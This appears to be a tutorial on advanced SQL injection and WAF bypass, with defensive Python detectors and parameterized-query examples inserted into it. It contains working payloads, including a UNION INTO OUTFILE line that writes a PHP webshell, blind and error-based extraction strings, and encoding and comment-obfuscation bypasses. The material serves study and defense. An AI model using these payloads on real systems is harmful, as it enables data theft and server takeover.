Advanced Exploitation of SQL Injection Attacks and Defense Bypass Techniques - A Detailed Guide

1. Knowledge Point Description
Advanced SQL Injection exploitation and defense bypass techniques represent a deepening of basic SQL injection skills, primarily targeting systems that have already deployed fundamental protective measures (such as WAFs, input filtering, parameterized queries, etc.). Attackers meticulously craft payloads, leverage database features, and employ techniques like encoding conversion to bypass security defenses and successfully execute malicious SQL statements. These techniques reflect the evolving nature of the attack-defense arms race and constitute a core challenge in the field of web security.

2. Advanced SQL Injection Exploitation Techniques

2.1 Extension of Union Query Injection

  • Deepened Principle: Union queries are not limited to data retrieval; they can also write files to the server (e.g., MySQL's INTO OUTFILE), which becomes command execution when the file written is a webshell placed in the web root.
  • Key Steps:
    1. After determining the number of fields, use UNION SELECT to write a webshell:
       UNION SELECT 1, '<?php system($_GET["cmd"]); ?>', 3 INTO OUTFILE '/var/www/html/shell.php'
    2. This requires the database user to hold the FILE privilege, and the secure_file_priv setting must permit writing to the target directory.

2.2 Automation of Boolean-Based Blind Injection

  • Principle: When there is no explicit error on the page but a difference in true/false states exists, data is extracted bit by bit through logical judgment.
  • Implementation Process:
    1. Construct conditional judgment statements: id=1' AND (SELECT ASCII(SUBSTRING(database(),1,1)))=104 --
    2. Determine the truth of the condition based on differences in page response (e.g., content length, status code).
    3. Use tools (like sqlmap) or scripts to automate the guessing of database names, table names, and field values.

2.3 Precise Control in Time-Based Blind Injection

  • Principle: Achieves data extraction in scenarios with no visible output by utilizing database delay functions.
  • Key Technical Points:
    1. MySQL's SLEEP(), BENCHMARK() functions.
    2. Combining conditional judgment with delays: id=1' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0) --
    3. Determine the truth of the condition based on response time differences (response time > 5 seconds indicates true).
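A defender-side counterpart to sections 2.2 and 2.3, added here as an example and not part of the original guide: a small Python detector run over constructed access-log lines (the log format, client addresses and request paths are invented for the example; the payload shapes are the ones shown above). It flags a client that sends many requests differing only in the compared integer, which is the signature of bit-by-bit boolean extraction, and any request carrying SQL syntax whose response time crosses the 5-second threshold that time-based injection relies on.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log, not from the page: "client_ip request_path status response_ms".
# The request shapes follow the boolean-based and time-based payloads discussed above.
SAMPLE_LOG = """\
10.0.0.5 /item?id=1 200 31
10.0.0.5 /item?id=1'%20AND%20(SELECT%20ASCII(SUBSTRING(database(),1,1)))=104%20-- 200 33
10.0.0.5 /item?id=1'%20AND%20(SELECT%20ASCII(SUBSTRING(database(),1,1)))=105%20-- 200 12
10.0.0.5 /item?id=1'%20AND%20(SELECT%20ASCII(SUBSTRING(database(),1,1)))=106%20-- 200 12
10.0.0.5 /item?id=1'%20AND%20(SELECT%20ASCII(SUBSTRING(database(),2,1)))=101%20-- 200 34
10.0.0.9 /item?id=1'%20AND%20IF(SUBSTRING(database(),1,1)='a',%20SLEEP(5),%200)%20-- 200 5012
10.0.0.9 /item?id=1'%20AND%20IF(SUBSTRING(database(),1,1)='b',%20SLEEP(5),%200)%20-- 200 14
10.0.0.7 /item?id=2 200 29
10.0.0.7 /search?q=select%20a%20book 200 40
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+)$")
# Functions used to pull out one character at a time for comparison.
EXTRACT_FN = re.compile(r"(?i)\b(ascii|ord|substr|substring|mid)\s*\(")
# Keywords that, next to a quote, make a query string look like SQL rather than text.
SQL_HINT = re.compile(r"(?i)\b(select|union|sleep|benchmark)\b")


def parse_log(text):
    """Yield (ip, decoded_path, status, ms) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ip, path, status, ms = m.groups()
            yield ip, unquote_plus(path), int(status), int(ms)


def request_template(path):
    """Collapse digit runs so that requests differing only in the compared value
    (character position, ASCII code) fall into the same bucket."""
    return re.sub(r"\d+", "N", path)


def looks_like_sql(path):
    """A quote plus a SQL keyword is the minimum shape of the payloads above."""
    return "'" in path and SQL_HINT.search(path) is not None


def detect_blind_probing(log_text, min_requests=3, slow_ms=5000):
    """Return sorted (ip, kind, evidence) findings for boolean- and time-based probing."""
    findings = []
    buckets = defaultdict(int)
    for ip, path, _status, ms in parse_log(log_text):
        if not looks_like_sql(path):
            continue
        buckets[(ip, request_template(path))] += 1
        if ms >= slow_ms:
            findings.append((ip, "time-based", f"{ms} ms for {path}"))
    for (ip, template), count in buckets.items():
        if count >= min_requests and EXTRACT_FN.search(template):
            findings.append((ip, "boolean-based", f"{count} requests shaped like {template}"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in detect_blind_probing(SAMPLE_LOG):
        print(*finding)
```

The boolean-based rule keys on the request shape rather than on any single payload, so it still fires when the attacker varies the keyword spelling, because the comparison value is the only thing that must change between requests. The time-based rule needs the response time, which most web servers log only when explicitly configured (for example `%D` in Apache or `$request_time` in nginx).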

2.4 Diversified Exploitation of Error-Based Injection

  • Principle: Exploits database error messages to leak data.
  • Common Techniques:
    1. extractvalue() function: id=1' AND extractvalue(1, concat(0x7e, (SELECT database()))) --
    2. updatexml() function: Utilizes XPath errors to leak data.
    3. Geometry function errors: Functions like ST_LatFromGeoHash() in MySQL 5.7+.

3. Detailed Defense Bypass Techniques

3.1 Encoding Bypass Techniques

  • URL Encoding: Double-encoding special characters (e.g., %2527 instead of a single quote).
  • Hexadecimal Encoding: Converting strings to hexadecimal literals (e.g., the string SELECT becomes 0x53454c454354).
  • Unicode Encoding: Bypassing filters using international character sets (e.g., %u0027, %u0053).

3.2 Comment Character Obfuscation Techniques

  • Multiple Comment Character Combinations: Alternating use of /**/, -- -, #, ;%00, etc.
  • Inline Comments: MySQL's /*!50000SELECT*/ can bypass simple keyword filters.
  • Flexible Placement of Comment Characters: Inserting comment characters within keywords (e.g., SEL/**/ECT).

3.3 Keyword Substitution and Splitting

  • Case Mixing: SeLeCt, UnIoN to bypass case-sensitive filters.
  • Double-Writing Keywords: SELSELECTECT to bypass simple replacement filters (e.g., those that replace SELECT with empty string).
  • Splitting with Special Characters: Using newline %0a, tab %09, etc., to split keywords.

3.4 Parameter Pollution Techniques

  • Principle: Leverages parameter parsing characteristics to pass malicious parameters.
  • Implementation: id=1&id=2' UNION SELECT 1,2,3 --, where the WAF might inspect the first parameter, but the application uses the last one.
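The bypasses in 3.1 through 3.4 all defeat a filter that inspects the raw request once. As an added example (not code from the original guide), the following Python compares such a weak blacklist with a detector that first normalizes each parameter value the way the database would parse it (repeated URL decoding, %uXXXX forms, inline and version comments, hex literals, whitespace separators, letter case) and that looks at every occurrence of a repeated parameter. The request strings are constructed for the example from the payload forms shown above; the helper names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed request query strings (not from the page), one per bypass technique above.
SAMPLE_REQUESTS = [
    "id=1",                                                              # benign
    "id=1%2527%20UniOn/**/SeLeCt%201,2,3%20FrOm%20admin%20--+",          # double-encoded quote, case mix, /**/
    "id=1'%20/*!50000UNION*/%0a/*!50000SELECT*/%091,2,3%20--%20",        # version comments, %0a/%09 separators
    "id=1'%20UniOn%20SELSELECTECT%201,2,3%20FROM%200x61646d696e%20--",   # double-written keyword, hex literal
    "id=1&id=2'%20UNION%20SELECT%201,2,3%20--",                          # parameter pollution
    "q=select%20a%20book",                                               # keyword in ordinary text
]

KEYWORDS = ("union", "select", "sleep", "benchmark")
# Quote or comment characters: a keyword alone is not evidence, a keyword next to these is.
STRUCTURE = re.compile(r"['\"]|--|#|;")


def iter_params(raw_query):
    """Yield (name, raw_value) for every occurrence, so repeated names are not lost."""
    for part in raw_query.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield name, value


def naive_blacklist(raw_query):
    """The weak rule the bypasses target: decodes once, keeps only the first value
    of each parameter, and matches keywords case-sensitively as whole words."""
    first = {}
    for name, value in iter_params(raw_query):
        first.setdefault(name, value)
    pattern = re.compile(r"\b(UNION|SELECT|SLEEP|BENCHMARK)\b")
    return any(pattern.search(unquote(v)) for v in first.values())


def naive_strip_once(value):
    """Single-pass sanitizer that deletes SELECT; double-writing survives it."""
    return value.replace("SELECT", "")


def normalize(value, max_rounds=4):
    """Reduce a parameter value to the form the database engine would see.
    Repeated until stable so that double encoding collapses too."""
    s = value
    for _ in range(max_rounds):
        before = s
        s = unquote(s)                                                    # one layer of %XX
        s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)  # %uXXXX
        s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)            # MySQL executes /*!50000...*/
        s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)                      # ordinary comments act as space
        s = re.sub(r"\b0x((?:[0-9a-fA-F]{2})+)\b",
                   lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), s)  # hex string literals
        s = re.sub(r"[\s\x00]+", " ", s).strip().lower()                  # %0a, %09, %00, case mixing
        if s == before:
            break
    return s


def flag_injection(raw_query):
    """Return [(name, normalized_value)] for every value that, once normalized,
    carries a SQL keyword together with quote or comment structure."""
    hits = []
    for name, value in iter_params(raw_query):
        n = normalize(value)
        if any(k in n for k in KEYWORDS) and STRUCTURE.search(n):
            hits.append((name, n))
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r}: naive={naive_blacklist(req)} normalized={flag_injection(req)}")
```

Two design points matter here. Comments are replaced by a space rather than deleted because that is how the MySQL tokenizer treats them, so the normalized form is what the engine actually executes; the keyword match is a plain substring check so that a double-written keyword is still seen, at the cost of needing the quote-or-comment condition to keep ordinary prose such as "select a book" from firing.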

3.5 Exploiting Database-Specific Features

  • MySQL Feature Bypass:
    • Utilizing version-specific comments like /*!50000*/.
    • Wrapping keywords with backticks: SELECT `version`().
  • SQL Server Features:
    • Using EXEC() for dynamic execution: EXEC('SELECT * FROM users').
    • Symbol separation: SELECT+1, SELECT.1.

4. Practical Advanced Bypass Case Studies

4.1 Bypassing WAF for Union Query Injection

Original payload: UNION SELECT 1,2,3 FROM admin
Bypass solutions:
1' UniOn/**/SeLeCt 1,2,3 FrOm admin --+
Or using hexadecimal: 1' UNION SELECT 1,2,3 FROM 0x61646d696e --

4.2 Bypassing Filters in Time-Based Blind Injection

Basic Filter: Filters keywords like SLEEP, BENCHMARK.
Bypass Solution:
1' AND (SELECT * FROM (SELECT(IF(ASCII(SUBSTR(database(),1,1))=104,
(SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C),0)))a) --
The three-way Cartesian product of information_schema.tables takes a long time to count, so the delay appears only when the condition is true, without calling SLEEP or BENCHMARK at all.

5. Evolution of Defense Measures

5.1 Multi-Layered Defense System

  • Input Validation: Whitelist validation is superior to blacklist filtering; every bypass in section 3 targets a blacklist.
  • Parameterized Queries: Using prepared statements so that user input is bound as data and never concatenated into the SQL text.
  • Principle of Least Privilege: Database accounts are granted permissions strictly as needed.
  • WAF Rule Updates: Dynamic rules based on regular expressions and behavioral analysis.
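An added example (not from the original guide) of the first two items in Python with sqlite3 from the standard library: the same lookup written with string concatenation and with a bound parameter, exercised with a tautology and a UNION payload of the kind discussed in section 2, plus an ORDER BY helper that shows why whitelist validation is still needed where parameters cannot be bound. The table and rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory table for the example (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 'user'), (2, 'bob', 'user'), (3, 'root', 'admin');
    """)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable form: the value is spliced into the SQL text, so a quote in the
    input ends the literal and the rest of the input is parsed as SQL."""
    sql = f"SELECT name FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, user_id):
    """Parameterized form: the statement is compiled first and the value is bound
    afterwards as data, so it can never change the query structure."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


# Identifiers (table and column names) cannot be bound as parameters, so the
# remaining dynamic part is checked against a whitelist rather than a blacklist.
ALLOWED_SORT_COLUMNS = {"id", "name"}


def list_users(conn, sort_by):
    """Only a known column name ever reaches the ORDER BY clause."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unexpected sort column: {sort_by!r}")
    return [row[0] for row in conn.execute(f"SELECT name FROM users ORDER BY {sort_by}")]


if __name__ == "__main__":
    conn = make_db()
    union_payload = "1' UNION SELECT role FROM users --"
    print("concatenated:", lookup_concat(conn, union_payload))   # leaks the role column
    print("parameterized:", lookup_param(conn, union_payload))   # []: the text matches no id
```

With the bound parameter the whole payload is compared against the id column as one opaque string, which matches nothing; no amount of encoding or comment trickery from section 3 changes that, because the input is never tokenized as SQL. The ORDER BY helper is the usual place where developers fall back to concatenation, and a set of permitted names is the only check that cannot be talked around.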

5.2 In-Depth Defense Strategies

  • Application Layer: Unified encoding handling, secure coding standards.
  • Network Layer: WAF deployment, traffic monitoring.
  • Database Layer: Stored procedure encapsulation, security configuration hardening.
  • Operations Layer: Log auditing, vulnerability scanning.

6. Summary
Advanced SQL injection techniques reflect the ongoing evolution of the attack-defense arms race. Defenders need to establish a defense-in-depth architecture, rather than relying on a single protective measure. Understanding the principles behind these techniques not only aids in security protection but also demonstrates a deep comprehension of database systems and web application architecture. In practical defense, parameterized queries remain the most effective fundamental solution currently available.